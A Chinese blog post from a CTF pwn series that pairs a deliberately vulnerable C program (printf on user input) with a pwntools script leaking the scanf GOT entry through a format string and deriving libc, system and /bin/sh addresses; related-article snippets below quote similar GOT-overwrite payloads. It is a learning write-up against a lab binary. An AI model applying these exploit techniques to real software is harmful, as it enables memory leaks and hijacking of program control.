格式化字符串漏洞泄露got表

最新推荐文章于 2024-06-01 22:21:19 发布
最新推荐文章于 2024-06-01 22:21:19 发布
阅读量693 收藏 2
点赞数
分类专栏: CTF 文章标签: ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fzuim/article/details/121447923
版权 
#include <stdio.h>
int main() {
  char s[100];
  scanf("%s", s);
  printf(s);
  return 0;
}

编译命令:gcc -m32 -fno-stack-protector -no-pie -o fmt fmt.c
泄露的payload先贴出来,再理解

# coding:utf-8
from pwn import*
from LibcSearcher import *

context.log_level = 'debug'

sh = process('./fmt')
elf = ELF('./fmt')

scanf_got_addr = elf.got['__isoc99_scanf']
print(hex(scanf_got_addr))

payload = p32(scanf_got_addr) + '%7$s'

# pause()
sh.sendline(payload)
# 泄露scanf的真实地址
scanf_addr = u32(sh.recv()[4:8])
print hex(scanf_addr)

# libc操作
libc = LibcSearcher('__isoc99_scanf', scanf_addr)
libc_base = scanf_addr - libc.dump('__isoc99_scanf')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')

sh.interactive()

gdb断点在printf
1

理解一下,字符串偏移7,所以payload为got偏移+%7$s,这边用’s而不是’p’,在于got表记录内容也是个指针,%s直接解引用,返回内容:got表偏移+真实地址,所以 u32(sh.recv()[4:8])
1

Fzuim
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ret2libc3地址泄露--pwn
weixin_44642009的博客
03-17 2693
练习三–ret2libc3地址泄露 在此实验前,我们从简到难实验了ret2libc1,ret2libc2两个实验,对getshell有了一定了解,基本学会了如何在有无system及/bin/sh函数的情况下获取权限,在此以实验二的名为pwn的可执行文件为入手点,进行getshell。 首先,对ret2libc3可执行文件进行检测, checksec ret2libc3 结果如图: 发现其不存...
格式化字符串漏洞利用
04-14
格式化字符串漏洞利用
格式化字符串之在栈上修改got,执行system(“/bin/sh“)
fzucaicai的博客
03-05 732
举个例子, payload = fmtstr_payload(7 , {printf_got : system_addr}) 其中,7。
泄漏libc基地址
最新发布
yjh_fnu_ltn的博客
06-01 1011
这里可以利用vulnerable_function函数进行栈溢出,利用write函数泄漏write函数的地址,从而拿到libc,使用write函数泄漏write函数地址时(puts函数同理),即使程序在前面。利用write函数的got和plt,溢出得到write函数的地址,在计算得到libc_base基地址。先看汇编下调用write函数时参数的传递:(以32位为例),泄漏 fun_name的got地址和。
ret2shellcode 的泄露puts@got
wing_7的博客
10-08 1081
现在rip在main+4处没执行puts,执行puts 后可以看到puts_got=> 0X601018里保存的是0X7FFDAA4E5430,可以使用ni si 进行调试看是否前后值有变化。手动设置栈上的值 发现 pop_rdi_ret设置的值 变换为0x4006f3 =》0x7fff004006f3(原因不明)发现read@got.pltb保存了read函数的blic中的地址。call read—> read的plt —>read的got。jmp到的其实这是plt对应函数的got
printf 格式化 输出_64位格式化字符串漏洞修改got利用详解
weixin_39631295的博客
11-27 1263
前言格式化字符串漏洞是最基础也是很老的一个漏洞了,网上一搜索就会有一堆的解释、原理、以及利用,但全都是对32位的格式化漏洞的解析,64位的几乎没有,就算有也被一笔带过。但是当你利用格式化漏洞来修改64位elf的got时,你会发现并没有详细的那么简单,虽然和32位的原理一样,但payload的构建方法却有所差别。甚至难度也大大增加故此有了此处尝试以及尝试后的一些总结漏洞分析程序源码:#...
[BJDCTF 2nd]r2t4 [格式化字符串GOT]
、moddemod
06-24 335
开启了Canary,但Canary失败的处理逻辑会进入到stack_chk_failed函数,stack_chk_failed函数是一个普通的延迟绑定函数,可以通过修改GOT劫持这个函数。 exp from pwn import * context(log_level='debug') proc_name = './r2t4' p = process(proc_name) # p = remote('node3.buuoj.cn', 29985) elf = ELF(proc_name) __...
C# 格式化字符串的实现代码
09-01
在C#编程中,格式化字符串是一项常用的功能,它允许开发者按照特定的模板和规则将变量或达式的值插入到字符串中。本文将深入探讨C#中如何实现字符串格式化,以及`String.Format`方法和`Console.WriteLine`方法在...
Python字符串格式化
09-21
### Python字符串格式化详解 #### 一、引言 在Python中,字符串是处理文本数据的基本数据类型之一。为了使程序输出的信息更加易读、美观,开发者常常需要对字符串进行格式化处理。其中,`%`操作符是早期Python版本...
C#格式化json字符串的方法分析
08-30
C#格式化json字符串的方法分析 在软件开发中,json字符串是非常常见的一种数据交换格式,然而在实际应用中,我们经常需要将json字符串格式化,以便于阅读和维护。C#作为一个强大的编程语言,提供了多种方法来格式化...
字符串格式化漏洞修改GOT一例
Carrot_kexin的博客
10-17 868
代码如下: from pwn import * context(arch='amd64', os='linux') elf = ELF("./pwn") io = remote("111.200.241.244", 56315) catflag_addr = 0x4008DA puts_got = elf.got['puts'] payload = fmtstr_payload(6, {puts_got: catflag_addr}) io.recvuntil("3. Exit the battle") i
格式化字符串泄露
tianxi blog's
05-04 436
got地址 如果要通过格式化字符串泄露出某个函数的got地址,需要使用格式化字符串来打印出来,而不能去直接通过: puts_got = elf.got['puts'] 把 puts_got 当做参数传到: libc = LibcSearcher('puts',puts_addr) 去查找 libc,因为 elf.got 获取的是 puts 函数的 got 地址地址,而不是 got ...
好好说话之格式化字符串漏洞利用
hollk’s blog
08-05 3242
编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ 一、格式化字符串漏洞利用 格式化字符串漏洞两大利用手段: 是程序崩溃,因为%s对应的参数地址不合法的概率比较大 查看进程内容,根据%d,%f输出了栈上的内容 二、程序崩溃 一般输入若干个%s即可 %s%s%s%s%s%s%s%s%s%s%s%s%s%s 栈上不可能每个值都对应了合法地址,总会有某个地址可以使得程序崩溃,不能控制,但是可以玩坏。例如,如果远程服务有个格式化字符串漏洞,那么就可以攻击其可用性,使服务崩溃,进而使
pwn刷题num47---off by one 修改size大小,造成堆块重叠,控制chunk内容指针,泄露函数真实地址,修改got,调用system
tbsqigongzi的博客
05-04 498
BUUCTF-PWN-hitcontraining_heapcreator 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got仍可写 开启canary保护-----栈溢出需绕过canary 开启NX保护-----堆栈不可执行 未开启PIE----函数地址为真实地址 动态链接 运行一下试试 功能基本上就是 1. 创建堆 2. 编辑堆 3.显示堆 4.删除堆 5.退出 ida看一下伪代码 主函数就是根据选择调用不
linux 格式化字符串漏洞
sky123博客
02-04 2115
格式化字符串漏洞 格式化字符串介绍 常见格式化字符串函数 函数 基本介绍 printf 输出到stdout fprintf 输出到指定FILE流 vprintf 根据参数列格式化输出到stdout vfprintf 根据参数列格式化输出到FILE流 sprintf 输出到字符串 snprintf 输出指定字节数到字符串 vsprintf 根据参数列格式化输出到字符串 vsnprintf 根据参数列格式化输出指定字节到字符串 常用格式化字符串形式 %[p
简单格式化字符串漏洞
2301_81031055的博客
02-19 566
经过分析之后,我们可以通过格式化字符串漏洞将puts函数的got改成main函数,这样的话,当程序执行puts函数的时候实际上是执行main函数,就会再次利用read函数以及printf函数。接下来我们先寻找函数的偏移(指令为:AAAA%p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p, %p)通过调试会发现偏移为11,此时打印出来的就为canary的地址,然后我们发送v4的时候将canary发送过去就会获取后门。
pwn学习】格式化字符漏洞
Morphy_Amo的博客
12-29 5849
文章目录什么是格式化字符漏洞格式化字符串函数格式化字符串利用泄露内存例题 利用格式化字符串漏洞获取libc基址覆盖内存栈地址覆盖小数覆盖大数覆盖轮子 什么是格式化字符漏洞 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串在利用的时候主要分为三个部分。 格式化字符串
基于符号执行的格式化字符串漏洞检测与测试用例生成
"格式化字符串漏洞自动检测与测试用例生成" 本文主要探讨的是格式化字符串漏洞的自动检测和测试用例生成技术。格式化字符串漏洞是软件安全领域中一种严重的安全问题,它允许攻击者通过精心构造的输入,操控程序内部...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值